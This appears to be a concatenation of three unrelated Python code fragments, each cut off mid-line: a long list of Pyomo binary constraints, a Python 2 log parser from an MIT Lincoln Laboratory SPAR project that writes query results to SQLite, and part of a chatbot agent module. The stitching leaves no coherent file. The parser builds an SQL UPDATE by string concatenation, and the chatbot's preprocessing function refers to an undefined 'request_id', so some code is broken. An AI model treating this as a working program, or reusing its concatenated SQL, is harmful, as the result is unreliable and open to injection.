m.c774 = Constraint(expr= m.b99 - m.b107 + m.b150 <= 1)
m.c775 = Constraint(expr= m.b99 - m.b109 + m.b151 <= 1)
m.c776 = Constraint(expr= m.b99 - m.b111 + m.b152 <= 1)
m.c777 = Constraint(expr= m.b99 - m.b113 + m.b153 <= 1)
m.c778 = Constraint(expr= m.b99 - m.b115 + m.b154 <= 1)
m.c779 = Constraint(expr= m.b101 - m.b103 + m.b155 <= 1)
m.c780 = Constraint(expr= m.b101 - m.b105 + m.b156 <= 1)
m.c781 = Constraint(expr= m.b101 - m.b107 + m.b157 <= 1)
m.c782 = Constraint(expr= m.b101 - m.b109 + m.b158 <= 1)
m.c783 = Constraint(expr= m.b101 - m.b111 + m.b159 <= 1)
m.c784 = Constraint(expr= m.b101 - m.b113 + m.b160 <= 1)
m.c785 = Constraint(expr= m.b101 - m.b115 + m.b161 <= 1)
m.c786 = Constraint(expr= m.b103 - m.b105 + m.b162 <= 1)
m.c787 = Constraint(expr= m.b103 - m.b107 + m.b163 <= 1)
m.c788 = Constraint(expr= m.b103 - m.b109 + m.b164 <= 1)
m.c789 = Constraint(expr= m.b103 - m.b111 + m.b165 <= 1)
m.c790 = Constraint(expr= m.b103 - m.b113 + m.b166 <= 1)
m.c791 = Constraint(expr= m.b103 - m.b115 + m.b167 <= 1)
m.c792 = Constraint(expr= m.b105 - m.b107 + m.b168 <= 1)
m.c793 = Constraint(expr= m.b105 - m.b109 + m.b169 <= 1)
m.c794 = Constraint(expr= m.b105 - m.b111 + m.b170 <= 1)
m.c795 = Constraint(expr= m.b105 - m.b113 + m.b171 <= 1)
m.c796 = Constraint(expr= m.b105 - m.b115 + m.b172 <= 1)
m.c797 = Constraint(expr= m.b107 - m.b109 + m.b173 <= 1)
m.c798 = Constraint(expr= m.b107 - m.b111 + m.b174 <= 1)
m.c799 = Constraint(expr= m.b107 - m.b113 + m.b175 <= 1)
m.c800 = Constraint(expr= m.b107 - m.b115 + m.b176 <= 1)
m.c801 = Constraint(expr= m.b109 - m.b111 + m.b177 <= 1)
m.c802 = Constraint(expr= m.b109 - m.b113 + m.b178 <= 1)
m.c803 = Constraint(expr= m.b109 - m.b115 + m.b179 <= 1)
m.c804 = Constraint(expr= m.b111 - m.b113 + m.b180 <= 1)
m.c805 = Constraint(expr= m.b111 - m.b115 + m.b181 <= 1)
m.c806 = Constraint(expr= m.b113 - m.b115 + m.b182 <= 1)
m.c807 = Constraint(expr= m.b93 - m.b96 + m.b117 <= 1)
m.c808 = Constraint(expr= m.b93 - m.b98 + m.b118 <= 1)
m.c809 = Constraint(expr= m.b93 - m.b100 + m.b119 <= 1)
m.c810 = Constraint(expr= m.b93 - m.b102 + m.b120 <= 1)
m.c811 = Constraint(expr= m.b93 - m.b104 + m.b121 <= 1)
m.c812 = Constraint(expr= m.b93 - m.b106 + m.b122 <= 1)
m.c813 = Constraint(expr= m.b93 - m.b108 + m.b123 <= 1)
m.c814 = Constraint(expr= m.b93 - m.b110 + m.b124 <= 1)
m.c815 = Constraint(expr= m.b93 - m.b112 + m.b125 <= 1)
m.c816 = Constraint(expr= m.b93 - m.b114 + m.b126 <= 1)
m.c817 = Constraint(expr= m.b93 - m.b116 + m.b127 <= 1)
m.c818 = Constraint(expr= m.b96 - m.b98 + m.b128 <= 1)
m.c819 = Constraint(expr= m.b96 - m.b100 + m.b129 <= 1)
m.c820 = Constraint(expr= m.b96 - m.b102 + m.b130 <= 1)
m.c821 = Constraint(expr= m.b96 - m.b104 + m.b131 <= 1)
m.c822 = Constraint(expr= m.b96 - m.b106 + m.b132 <= 1)
m.c823 = Constraint(expr= m.b96 - m.b108 + m.b133 <= 1)
m.c824 = Constraint(expr= m.b96 - m.b110 + m.b134 <= 1)
m.c825 = Constraint(expr= m.b96 - m.b112 + m.b135 <= 1)
m.c826 = Constraint(expr= m.b96 - m.b114 + m.b136 <= 1)
m.c827 = Constraint(expr= m.b96 - m.b116 + m.b137 <= 1)
m.c828 = Constraint(expr= m.b98 - m.b100 + m.b138 <= 1)
m.c829 = Constraint(expr= m.b98 - m.b102 + m.b139 <= 1)
m.c830 = Constraint(expr= m.b98 - m.b104 + m.b140 <= 1)
m.c831 = Constraint(expr= m.b98 - m.b106 + m.b141 <= 1)
m.c832 = Constraint(expr= m.b98 - m.b108 + m.b142 <= 1)
m.c833 = Constraint(expr= m.b98 - m.b110 + m.b143 <= 1)
m.c834 = Constraint(expr= m.b98 - m.b112 + m.b144 <= 1)
m.c835 = Constraint(expr= m.b98 - m.b114 + m.b145 <= 1)
m.c836 = Constraint(expr= m.b98 - m.b116 + m.b146 <= 1)
m.c837 = Constraint(expr= m.b100 - m.b102 + m.b147 <= 1)
m.c838 = Constraint(expr= m.b100 - m.b104 + m.b148 <= 1)
m.c839 = Constraint(expr= m.b100 - m.b106 + m.b149 <= 1)
m.c840 = Constraint(expr= m.b100 - m.b108 + m.b150 <= 1)
m.c841 = Constraint(expr= m.b100 - m.b110 + m.b151 <= 1)
m.c842 = Constraint(expr= m.b100 - m.b112 + m.b152 <= 1)
m.c843 = Constraint(expr= m.b100 - m.b114 + m.b153 <= 1)
m.c844 = Constraint(expr= m.b100 - m.b116 + m.b154 <= 1)
m.c845 = Constraint(expr= m.b102 - m.b104 + m.b155 <= 1)
m.c846 = Constraint(expr= m.b102 - m.b106 + m.b156 <= 1)
m.c847 = Constraint(expr= m.b102 - m.b108 + m.b157 <= 1)
m.c848 = Constraint(expr= m.b102 - m.b110 + m.b158 <= 1)
m.c849 = Constraint(expr= m.b102 - m.b112 + m.b159 <= 1)
m.c850 = Constraint(expr= m.b102 - m.b114 + m.b160 <= 1)
m.c851 = Constraint(expr= m.b102 - m.b116 + m.b161 <= 1)
m.c852 = Constraint(expr= m.b104 - m.b106 + m.b162 <= 1)
m.c853 = Constraint(expr= m.b104 - m.b108 + m.b163 <= 1)
m.c854 = Constraint(expr= m.b104 - m.b110 + m.b164 <= 1)
m.c855 = Constraint(expr= m.b104 - m.b112 + m.b165 <= 1)
m.c856 = Constraint(expr= m.b104 - m.b114 + m.b166 <= 1)
m.c857 = Constraint(expr= m.b104 - m.b116 + m.b167 <= 1)
m.c858 = Constraint(expr= m.b106 - m.b108 + m.b168 <= 1)
m.c859 = Constraint(expr= m.b106 - m.b110 + m.b169 <= 1)
m.c860 = Constraint(expr= m.b106 - m.b112 + m.b170 <= 1)
m.c861 = Constraint(expr= m.b106 - m.b114 + m.b171 <= 1)
m.c862 = Constraint(expr= m.b106 - m.b116 + m.b172 <= 1)
m.c863 = Constraint(expr= m.b108 - m.b110 + m.b173 <= 1)
m.c864 = Constraint(expr= m.b108 - m.b112 + m.b174 <= 1)
m.c865 = Constraint(expr= m.b108 - m.b114 + m.b175 <= 1)
m.c866 = Constraint(expr= m.b108 - m.b116 + m.b176 <= 1)
m.c867 = Constraint(expr= m.b110 - m.b112 + m.b177 <= 1)
m.c868 = Constraint(expr= m.b110 - m.b114 + m.b178 <= 1)
m.c869 = Constraint(expr= m.b110 - m.b116 + m.b179 <= 1)
m.c870 = Constraint(expr= m.b112 - m.b114 + m.b180 <= 1)
m.c871 = Constraint(expr= m.b112 - m.b116 + m.b181 <= 1)
m.c872 = Constraint(expr= m.b114 - m.b116 + m.b182 <= 1)
m.c873 = Constraint(expr= m.b117 - m.b118 + m.b128 <= 1)
m.c874 = Constraint(expr= m.b117 - m.b119 + m.b129 <= 1)
m.c875 = Constraint(expr= m.b117 - m.b120 + m.b130 <= 1)
m.c876 = Constraint(expr= m.b117 - m.b121 + m.b131 <= 1)
m.c877 = Constraint(expr= m.b117 - m.b122 + m.b132 <= 1)
m.c878 = Constraint(expr= m.b117 - m.b123 + m.b133 <= 1)
m.c879 = Constraint(expr= m.b117 - m.b124 + m.b134 <= 1)
m.c880 = Constraint(expr= m.b117 - m.b125 + m.b135 <= 1)
m.c881 = Constraint(expr= m.b117 - m.b126 + m.b136 <= 1)
m.c882 = Constraint(expr= m.b117 - m.b127 + m.b137 <= 1)
m.c883 = Constraint(expr= m.b118 - m.b119 + m.b138 <= 1)
m.c884 = Constraint(expr= m.b118 - m.b120 + m.b139 <= 1)
m.c885 = Constraint(expr= m.b118 - m.b121 + m.b140 <= 1)
m.c886 = Constraint(expr= m.b118 - m.b122 + m.b141 <= 1)
m.c887 = Constraint(expr= m.b118 - m.b123 + m.b142 <= 1)
m.c888 = Constraint(expr= m.b118 - m.b124 + m.b143 <= 1)
m.c889 = Constraint(expr= m.b118 - m.b125 + m.b144 <= 1)
m.c890 = Constraint(expr= m.b118 - m.b126 + m.b145 <= 1)
m.c891 = Constraint(expr= m.b118 - m.b127 + m.b146 <= 1)
m.c892 = Constraint(expr= m.b119 - m.b120 + m.b147 <= 1)
m.c893 = Constraint(expr= m.b119 - m.b121 + m.b148 <= 1)
m.c894 = Constraint(expr= m.b119 - m.b122 + m.b149 <= 1)
m.c895 = Constraint(expr= m.b119 - m.b123 + m.b150 <= 1)
m.c896 = Constraint(expr= m.b119 - m.b124 + m.b151 <= 1)
m.c897 = Constraint(expr= m.b119 - m.b125 + m.b152 <= 1)
m.c898 = Constraint(expr= m.b119 - m.b126 + m.b153 <= 1)
m.c899 = Constraint(expr= m.b119 - m.b127 + m.b154 <= 1)
m.c900 = Constraint(expr= m.b120 - m.b121 + m.b155 <= 1)
m.c901 = Constraint(expr= m.b120 - m.b122 + m.b156 <= 1)
m.c902 = Constraint(expr= m.b120 - m.b123 + m.b157 <= 1)
m.c903 = Constraint(expr= m.b120 - m.b124 + m.b158 <= 1)
m.c904 = Constraint(expr= m.b120 - m.b125 + m.b159 <= 1)
m.c905 = Constraint(expr= m.b120 - m.b126 + m.b160 <= 1)
m.c906 | |
# *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: <NAME>
# Description: Parser for the perfomer queries log file.
# Results are stored in a DB.
# *****************************************************************
import argparse
import logging
import re
import collections
import sqlite3
import os
import sys
this_dir = os.path.dirname(os.path.realpath(__file__))
base_dir = os.path.join(this_dir, '..', '..', '..')
sys.path.append(base_dir)
import spar_python.report_generation.ta1.ta1_database as ta1_database
import spar_python.report_generation.ta1.ta1_schema as ta1_schema
import spar_python.analytics.common.log_parser_util as log_parser_util
from spar_python.perf_monitoring.create_perf_graphs import PerfGraphGenerator
LOGGER = logging.getLogger(__name__)
FILE_PATTERN = re.compile('^(Unloaded|VariableDelay)QueryRunner-\w+')
TIME_PATTERN = re.compile('\[(?P<timestamp>[0-9]+\.[0-9]+)\] '
'(?P<message>.*)')
TC_PATTERN = re.compile('[0-9-]{10} [0-9:]{8} (?P<performer>[^-]+)-[^-]+-'
'(?P<tc_id>[^_]+)_.+')
SENT_PATTERN = re.compile('ID (?P<cmd_id>[0-9]+-[0-9]+) sent')
COMMAND_PATTERN = re.compile('ID (?P<cmd_id>[0-9]+-[0-9]+) '
'QID (?P<qid>[0-9]+): '
'\[\[SELECT (?P<cols>.+) FROM main '
'WHERE (?P<query>.*)\]\]')
RESULTS_PATTERN = re.compile('ID (?P<cmd_id>[0-9]+-[0-9]+) results:')
FAIL_PATTERN = re.compile('FAILED.*')
HASH_PATTERN = re.compile('(?P<result_id>[0-9]+) (?P<result_hash>[0-9a-f]+)')
EVENT_PATTERN = re.compile('ID (?P<cmd_id>[0-9]+-[0-9]+) event '
'(?P<event_id>[0-9]+)( with value \[\['
'(?P<event_val>[\d]+)\]\])? occurred')
ENDLOG_PATTERN = re.compile('END_OF_LOG')
class Rex:
"""Class to run a regular expression and store the groups for
later retrieval. Allows for clean if blocks of multiple regular
expression patterns with different defined groups.
if rex_obj.pmatch(REGEX, line):
match = regex_obj.m.group('match1')
elif rex_obj.pmatch(REGEX2, line):
match = rex_obj.m.group('match2')
"""
def __init__(self):
self.m = None
def pmatch(self, regex, line):
"""Execute regular expression match on <line>. Return True
on a match and store the MatchObject, False otherwise."""
self.m = regex.match(line)
if self.m:
return True
else:
return False
def get_global_id(cmd_id):
ids = cmd_id.split('-')
assert ids[0]
return ids[0]
def process_matches(matches):
"""Sort and separate the list of matches and optional hash pairs.
Returns a list of ids and a list of hashes sorted by id."""
id_list = []
hash_list = []
for row_id in sorted(matches, key=long):
id_list.append(str(row_id))
if (matches[row_id] != ''):
hash_list.append(matches[row_id])
return (id_list, hash_list)
def process_query(log_parser, query, cmd_id, matches, events, results_db, record_func, flags):
"""Process the query results, and push to DB."""
# Attempt inserting a new row into the performer_queries table
if (not log_parser.verify_result(query, [ta1_schema.DBP_SELECTIONCOLS, \
ta1_schema.DBP_SENDTIME])):
LOGGER.error('No evidence of command %s ever being sent',
cmd_id)
return False
else:
(result_ids, result_hashes) = process_matches(matches)
(event_ts, event_ids, event_vals) = log_parser.process_events(events)
query.update(
{ta1_schema.DBP_RETURNEDRECORDHASHES : result_hashes,
ta1_schema.DBP_RETURNEDRECORDIDS : result_ids,
ta1_schema.DBP_EVENTMSGTIMES : event_ts,
ta1_schema.DBP_EVENTMSGIDS : event_ids,
ta1_schema.DBP_EVENTMSGVALS : event_vals})
if flags['mod']:
query.update({ta1_schema.DBP_ISMODIFICATIONQUERY : 1})
else:
query.update({ta1_schema.DBP_ISMODIFICATIONQUERY : 0})
if flags['throughput']:
query.update({ta1_schema.DBP_ISTHROUGHPUTQUERY : 1})
else:
query.update({ta1_schema.DBP_ISTHROUGHPUTQUERY : 0})
# Apply record_func to the complete query, and return the result
return (record_func(query, cmd_id, results_db))
def append_baseline_matches(qid, cmd_id, matches, baseline_matches):
'''
Will add (qid, cmd_id, matches) to baseline_matches.
baseline_matches is a dictionary indexed by qid which contains
a list of dictionaries. The inner dictionary contains a field for
'cmd_id' and 'matches'.
When all the log files are parsed, there should be an entry for
each modification id which will contain a list of size 2. One
entry for the pre query results and another for the post query
results. The "pre" value will be the one with the lower cmd_id.
The "post" value will be the one with the larger cmd_id.
'''
new_entry = { 'global_id': get_global_id(cmd_id), 'matches': matches }
baseline_matches[qid].append(new_entry)
def process_baseline_matches(all_baseline_matches, results_db):
'''
Fill in the mod to mod queries join table matching records and hash fields
'''
for qid, data in all_baseline_matches.iteritems():
if len(data) != 2:
LOGGER.warning("QID %d does not have 2 modification logs. "
"Instead it has %d logs. It should have a "
"pre modification log and a post modification "
"log. Skipping it", qid, len(data))
continue
# pre should be the entry with the lowest cmd_id
pre_index = 0
post_index = 1
if data[pre_index][0]['global_id'] > data[post_index][0]['global_id']:
pre_index = 1
post_index = 0
(pre_ids, pre_hashes) = process_matches(data[pre_index][0]['matches'])
(post_ids, post_hashes) = process_matches(data[post_index][0]['matches'])
# modify result database row with qid to add values
'''
M2MQ_TABLENAME = "mods_to_modqueries"
M2MQ_QID = "qid"
M2MQ_MID = "mid"
M2MQ_PREIDS = "pre_matching_record_ids"
M2MQ_PREHASHES = "pre_matching_record_hashes"
M2MQ_POSTIDS = "post_matching_record_ids"
M2MQ_POSTHASHES = "post_matching_record_hashes"
'''
cmd = 'UPDATE ' + ta1_schema.M2MQ_TABLENAME + ' SET ' + \
ta1_schema.M2MQ_PREIDS + '=' + \
'\'' + '|'.join(pre_ids) + '\'' + \
', ' + \
ta1_schema.M2MQ_PREHASHES + '=' + \
'\'' + '|'.join(pre_hashes) + '\'' + \
', ' + \
ta1_schema.M2MQ_POSTIDS + '=' + \
'\'' + '|'.join(post_ids) + '\'' + \
', ' + \
ta1_schema.M2MQ_POSTHASHES + '=' + \
'\'' + '|'.join(post_hashes) + '\'' + \
' WHERE ' + ta1_schema.M2MQ_QID + '=' + str(qid)
results_db._execute(cmd)
def parse_queries(log_parser, in_file, record_func, results_db, flags):
"""Main function that parses a log file, and applies record_func to each
complete record of query information. record_func can be used to do any
number of things, including updating a sqlite database, or writing out
results to a *.csv file. Returns the number of *new* records processed.
"""
num_records = 0
rex_obj = Rex()
temp_query_dict = collections.defaultdict(dict)
tc_id = '000'
performer = 'PERF'
results = {'flag' : False, 'cmd_id' : ''}
matches = {}
events_dict = collections.defaultdict(dict)
cmd_id = ''
baseline_matches = collections.defaultdict(list)
for line in in_file:
# Strip EOL
line = line.strip()
# Skip blank lines
if len(line) == 0:
continue
LOGGER.debug('Parsing %s...', line)
if (rex_obj.pmatch(TIME_PATTERN, line)):
# Found a timestamped line
timestamp = repr(float(rex_obj.m.group('timestamp')))
res = rex_obj.m.group('message')
if results['flag']:
if (rex_obj.pmatch(EVENT_PATTERN, res)):
# Found an event
cmd_id = rex_obj.m.group('cmd_id')
event_id = rex_obj.m.group('event_id')
event_val = rex_obj.m.group('event_val')
if (cmd_id not in temp_query_dict.keys()) or \
(ta1_schema.DBP_SENDTIME not in temp_query_dict[cmd_id]):
# Event is for an invalid command, one that was not
# sent yet, or one that finished; it's not valid.
LOGGER.warning('Found an invalid event for ' +\
'command id = %s ', cmd_id)
else:
# Event is for another valid command
events_dict[cmd_id].update({timestamp : [event_id, \
event_val]})
continue
else: # The END_OF_LOG case will **not** hit here
# The line has a timestamp and it's not an event so the
# results are done.
results_cmd_id = results['cmd_id']
if flags['baseline']:
# special for baseline mods; save all query data
qid = temp_query_dict[results_cmd_id][ta1_schema.DBP_FQID]
append_baseline_matches(qid,
results_cmd_id, matches,
baseline_matches)
else:
if process_query(log_parser, \
temp_query_dict[results_cmd_id], \
results_cmd_id, matches, \
events_dict[results_cmd_id], \
results_db, \
record_func, flags):
num_records += 1
# Conserve memory by deleting the unneeded entry in
# temp_query_dict. This is also necessary to keep track of
# valid cmd_id's for eventmsg collecting.
del temp_query_dict[results_cmd_id]
#clear results flag keep going
results['flag'] = False
results['cmd_id'] = ''
else:
if results['flag']:
# Grab results
if (rex_obj.pmatch(FAIL_PATTERN, line)):
LOGGER.warning('Command %s had FAILED results',
results['cmd_id'])
# If we had a previous failure in this query, add the new
# failure message to the existing message
prev_fail_msg = temp_query_dict[results['cmd_id']] \
[ta1_schema.DBP_STATUS]
fail_msgs = []
if (prev_fail_msg):
fail_msgs = prev_fail_msg
fail_msgs.append('FAILED')
for line in in_file:
line = line.strip()
if line == 'ENDFAILED':
break
if (rex_obj.pmatch(TIME_PATTERN, line)):
timestamp = repr(float(rex_obj.m.group('timestamp')))
res = rex_obj.m.group('message')
if (rex_obj.pmatch(EVENT_PATTERN, res)):
# Found an event
cmd_id = rex_obj.m.group('cmd_id')
event_id = rex_obj.m.group('event_id')
event_val = rex_obj.m.group('event_val')
if (cmd_id not in temp_query_dict.keys()) or \
(ta1_schema.DBP_SENDTIME not in \
temp_query_dict[cmd_id]):
# Event is for an invalid command, one that
# was not sent yet, or one that finished;
# it's not valid.
LOGGER.warning('Found an invalid event ' +\
'for command id = %s ', \
cmd_id)
else:
# Event is for another valid command
events_dict[cmd_id].update({timestamp : \
[event_id, event_val]})
else:
# Found timestamped line before ENDFAILED
LOGGER.warning('Found a timestamped line ' +\
'before ENDFAILED for command ' +\
'id = %s ', results[cmd_id])
else:
fail_msgs.append(line)
temp_query_dict[results['cmd_id']].update(
{ta1_schema.DBP_STATUS : fail_msgs})
elif (rex_obj.pmatch(HASH_PATTERN, line)):
# Else, add relevant data if there is both a row and a hash
matches[long(rex_obj.m.group('result_id'))] = \
rex_obj.m.group('result_hash')
else:
# Else, add only row
matches[line] = ''
else:
# Skip it
LOGGER.warning("Skipping line without timestamp: %s", line)
continue
# Continue to parse the timestamped line
if (rex_obj.pmatch(TC_PATTERN, res)):
# Found test case pattern
LOGGER.debug('Found testcase')
tc_id = rex_obj.m.group('tc_id')
performer = rex_obj.m.group('performer')
elif (rex_obj.pmatch(SENT_PATTERN, res)):
# Found sent pattern
LOGGER.debug('Found sent statement')
cmd_id = rex_obj.m.group('cmd_id')
temp_query_dict[cmd_id].update(
{ta1_schema.DBP_PERFORMERNAME : performer,
ta1_schema.DBP_TESTCASEID : tc_id,
ta1_schema.DBP_SENDTIME : timestamp})
elif (rex_obj.pmatch(COMMAND_PATTERN, res)):
# Found command pattern
LOGGER.debug('Found command statement')
cmd_id = rex_obj.m.group('cmd_id')
temp_query_dict[cmd_id].update(
{ta1_schema.DBP_PERFORMERNAME : performer,
ta1_schema.DBP_TESTCASEID : tc_id,
ta1_schema.DBP_FQID : long(rex_obj.m.group('qid')),
ta1_schema.DBP_SELECTIONCOLS : rex_obj.m.group('cols')})
elif (rex_obj.pmatch(RESULTS_PATTERN, res)):
# Found results pattern
LOGGER.debug('Found results statement')
cmd_id = rex_obj.m.group('cmd_id')
temp_query_dict[cmd_id].update(
{ta1_schema.DBP_RESULTSTIME : timestamp,
ta1_schema.DBP_STATUS : []})
# Calculate elapsed time
if ta1_schema.DBP_SENDTIME in | |
<filename>src/chatbot/server/chatbot_agent.py
# -*- coding: utf-8 -*-
import traceback
import logging
import random
import os
import re
import sys
import numpy as np
import datetime as dt
reload(sys)
sys.setdefaultencoding('utf-8')
import atexit
from collections import defaultdict, OrderedDict
from threading import RLock
sync = RLock()
SUCCESS = 0
WRONG_CHARACTER_NAME = 1
NO_PATTERN_MATCH = 2
INVALID_SESSION = 3
INVALID_QUESTION = 4
TRANSLATE_ERROR = 5
logger = logging.getLogger('hr.chatbot.server.chatbot_agent')
from loader import load_characters, dyn_properties
from config import CHARACTER_PATH, RESET_SESSION_BY_HELLO, config
CHARACTERS = load_characters(CHARACTER_PATH)
REVISION = os.environ.get('HR_CHATBOT_REVISION')
LOCATION = dyn_properties.get('location')
IP = dyn_properties.get('ip')
from session import ChatSessionManager
session_manager = ChatSessionManager()
DISABLE_QUIBBLE = True
FALLBACK_LANG = 'en-US'
from chatbot.utils import (shorten, str_cleanup, get_weather, parse_weather,
do_translate, norm2)
from chatbot.words2num import words2num
from chatbot.server.character import TYPE_AIML, TYPE_CS
from operator import add, sub, mul, truediv, pow
import math
from chatbot.server.template import render
OPERATOR_MAP = {
'[add]': add,
'[sub]': sub,
'[mul]': mul,
'[div]': truediv,
'[pow]': pow,
}
RESPONSE_TYPE_WEIGHTS = {
'pass': 100,
'nogoodmatch': 50,
'quibble': 40,
'gambit': 50,
'repeat': 0,
'pickup': 0,
'es': 20,
'markov': 5,
}
def get_character(id, lang=None, ns=None):
for character in CHARACTERS:
if (ns is not None and character.name != ns) or character.id != id:
continue
if lang is None:
return character
elif lang in character.languages:
return character
def add_character(character):
if character.id not in [c.id for c in CHARACTERS]:
CHARACTERS.append(character)
return True, "Character added"
# TODO: Update character
else:
return False, "Character exists"
def is_local_character(character):
return character.local
def get_characters_by_name(name, local=True, lang=None, user=None):
characters = []
_characters = [c for c in CHARACTERS if c.name == name]
if local:
_characters = [c for c in _characters if is_local_character(c)]
if lang is not None:
_characters = [c for c in _characters if lang in c.languages]
if user is not None:
for c in _characters:
toks = c.id.split('/')
if len(toks) == 2:
if toks[0] == user:
characters.append(c)
else:
characters.append(c)
else:
characters = _characters
if not characters:
logger.warn('No character is satisfied')
return characters
def list_character(lang, sid):
sess = session_manager.get_session(sid)
if sess is None:
return []
characters = get_responding_characters(lang, sid)
weights = get_weights(characters, sess)
return [(c.name, c.id, w, c.level, c.dynamic_level) for c, w in zip(characters, weights)]
def list_character_names():
names = list(set([c.name for c in CHARACTERS if c.name != 'dummy']))
return names
def set_weights(param, lang, sid):
sess = session_manager.get_session(sid)
if sess is None:
return False, "No session"
if param == 'reset':
sess.session_context.weights = {}
return True, "Weights are reset"
weights = {}
characters = get_responding_characters(lang, sid)
try:
for w in param.split(','):
k, v = w.split('=')
v = float(v)
if v>1 or v<0:
return False, "Weight must be in the range [0, 1]"
try:
k = int(k)
weights[characters[k].id] = v
except ValueError:
weights[k] = v
except Exception as ex:
logger.error(ex)
logger.error(traceback.format_exc())
return False, "Wrong weight format"
sess.session_context.weights = weights
return True, "Weights are updated"
def get_weights(characters, sess):
weights = []
if hasattr(sess.session_context, 'weights') and sess.session_context.weights:
for c in characters:
if c.id in sess.session_context.weights:
weights.append(sess.session_context.weights.get(c.id))
else:
weights.append(c.weight)
else:
weights = [c.weight for c in characters]
return weights
def set_context(prop, sid):
sess = session_manager.get_session(sid)
if sess is None:
return False, "No session"
for c in CHARACTERS:
try:
c.set_context(sess, prop)
except Exception:
pass
return True, "Context is updated"
def remove_context(keys, sid):
sess = session_manager.get_session(sid)
if sess is None:
return False, "No session"
for c in CHARACTERS:
if c.type != TYPE_AIML and c.type != TYPE_CS:
continue
try:
for key in keys:
c.remove_context(sess, key)
except Exception:
pass
return True, "Context is updated"
def get_context(sid, lang):
sess = session_manager.get_session(sid)
if sess is None:
return False, "No session"
characters = get_responding_characters(lang, sid)
context = {}
for c in characters:
if not c.stateful:
continue
try:
context.update(c.get_context(sess))
except Exception as ex:
logger.error("Get context error, {}".format(ex))
logger.error(traceback.format_exc())
for k in context.keys():
if k.startswith('_'):
del context[k]
return True, context
def update_config(**kwargs):
keys = []
for key, value in kwargs.items():
if key in config:
if isinstance(value, unicode):
value = str(value)
config[key] = value
if key not in keys:
keys.append(key)
else:
logger.warn("Unknown config {}".format(key))
if len(keys) > 0:
logger.warn("Configuration is updated")
for key in keys:
logger.warn("{}={}".format(key, config[key]))
return True, "Configuration is updated"
else:
return False, "No configuration is updated"
def preprocessing(question, lang, session):
question = question.lower().strip()
question = ' '.join(question.split()) # remove consecutive spaces
question = question.replace('sofia', 'sophia')
reduction = get_character('reduction')
if reduction is not None:
response = reduction.respond(question, lang, session, query=True, request_id=request_id)
reducted_text = response.get('text')
if reducted_text:
question = reducted_text
return question
def _ask_characters(characters, question, lang, sid, query, request_id, **kwargs):
sess = session_manager.get_session(sid)
if sess is None:
return
used_charaters = []
data = sess.session_context
user = getattr(data, 'user')
botname = getattr(data, 'botname')
weights = get_weights(characters, sess)
weighted_characters = zip(characters, weights)
weighted_characters = [wc for wc in weighted_characters if wc[1]>0]
logger.info("Weights {}".format(weights))
_question = preprocessing(question, lang, sess)
response = {}
hit_character = None
answer = None
cross_trace = []
cached_responses = defaultdict(list)
control = get_character('control')
if control is not None:
_response = control.respond(_question, lang, sess, query, request_id)
_answer = _response.get('text')
if _answer == '[tell me more]':
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
if sess.last_used_character:
if sess.cache.that_question is None:
sess.cache.that_question = sess.cache.last_question
context = sess.last_used_character.get_context(sess)
if 'continue' in context and context.get('continue'):
_answer, res = shorten(context.get('continue'), 140)
response['text'] = answer = _answer
response['botid'] = sess.last_used_character.id
response['botname'] = sess.last_used_character.name
sess.last_used_character.set_context(sess, {'continue': res})
hit_character = sess.last_used_character
cross_trace.append((sess.last_used_character.id, 'continuation', 'Non-empty'))
else:
_question = sess.cache.that_question.lower().strip()
cross_trace.append((sess.last_used_character.id, 'continuation', 'Empty'))
elif _answer.startswith('[weather]'):
template = _answer.replace('[weather]', '')
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
context = control.get_context(sess)
if context:
location = context.get('querylocation')
prop = parse_weather(get_weather(location))
if prop:
try:
_answer = template.format(location=location, **prop)
if _answer:
answer = _answer
response['text'] = _answer
response['botid'] = control.id
response['botname'] = control.name
except Exception as ex:
cross_trace.append((control.id, 'control', 'No answer'))
logger.error(ex)
logger.error(traceback.format_exc())
else:
cross_trace.append((control.id, 'control', 'No answer'))
elif _answer in OPERATOR_MAP.keys():
opt = OPERATOR_MAP[_answer]
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
context = control.get_context(sess)
if context:
item1 = context.get('item1')
item2 = context.get('item2')
item1 = words2num(item1)
item2 = words2num(item2)
if item1 is not None and item2 is not None:
try:
result = opt(item1, item2)
img = math.modf(result)[0]
if img < 1e-6:
result_str = '{:d}'.format(int(result))
else:
result_str = 'about {:.4f}'.format(result)
if result > 1e20:
answer = "The number is too big. You should use a calculator."
else:
answer = "The answer is {result}".format(result=result_str)
except ZeroDivisionError:
answer = "Oh, the answer is not a number"
except Exception as ex:
logger.error(ex)
logger.error(traceback.format_exc())
answer = "Sorry, something goes wrong. I can't calculate it."
response['text'] = answer
response['botid'] = control.id
response['botname'] = control.name
else:
cross_trace.append((control.id, 'control', 'No answer'))
else:
if _answer and not re.findall(r'\[.*\].*', _answer):
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
hit_character = control
answer = _answer
response = _response
else:
cross_trace.append((control.id, 'control', 'No answer'))
for c in characters:
try:
c.remove_context(sess, 'continue')
except NotImplementedError:
pass
sess.cache.that_question = None
def _ask_character(stage, character, weight, good_match=False, reuse=False):
logger.info("Asking character {} \"{}\" in stage {}".format(
character.id, _question, stage))
if not reuse and character.id in used_charaters:
cross_trace.append((character.id, stage, 'Skip used tier'))
return False, None, None
if character.id in used_charaters and character.type == TYPE_CS:
cross_trace.append((character.id, stage, 'Skip CS tier'))
return False, None, None
used_charaters.append(character.id)
answer = None
answered = False
if weight == 0:
cross_trace.append((character.id, stage, 'Disabled'))
logger.warn("Character \"{}\" in stage {} is disabled".format(
character.id, stage))
return False, None, None
response = character.respond(_question, lang, sess, query, request_id)
answer = str_cleanup(response.get('text', ''))
trace = response.get('trace')
if answer:
if 'pickup' in character.id:
cached_responses['pickup'].append((response, answer, character))
return False, None, None
if good_match:
if response.get('exact_match') or response.get('ok_match'):
if response.get('gambit'):
if random.random() < 0.3:
logger.info("{} has gambit but dismissed".format(character.id))
cross_trace.append((character.id, stage, 'Ignore gambit answer. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['gambit'].append((response, answer, character))
else:
logger.info("{} has gambit".format(character.id))
answered = True
else:
logger.info("{} has good match".format(character.id))
answered = True
else:
if not response.get('bad'):
logger.info("{} has no good match".format(character.id))
cross_trace.append((character.id, stage, 'No good match. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['nogoodmatch'].append((response, answer, character))
elif response.get('bad'):
cross_trace.append((character.id, stage, 'Bad answer. Answer: {}, Trace: {}'.format(answer, trace)))
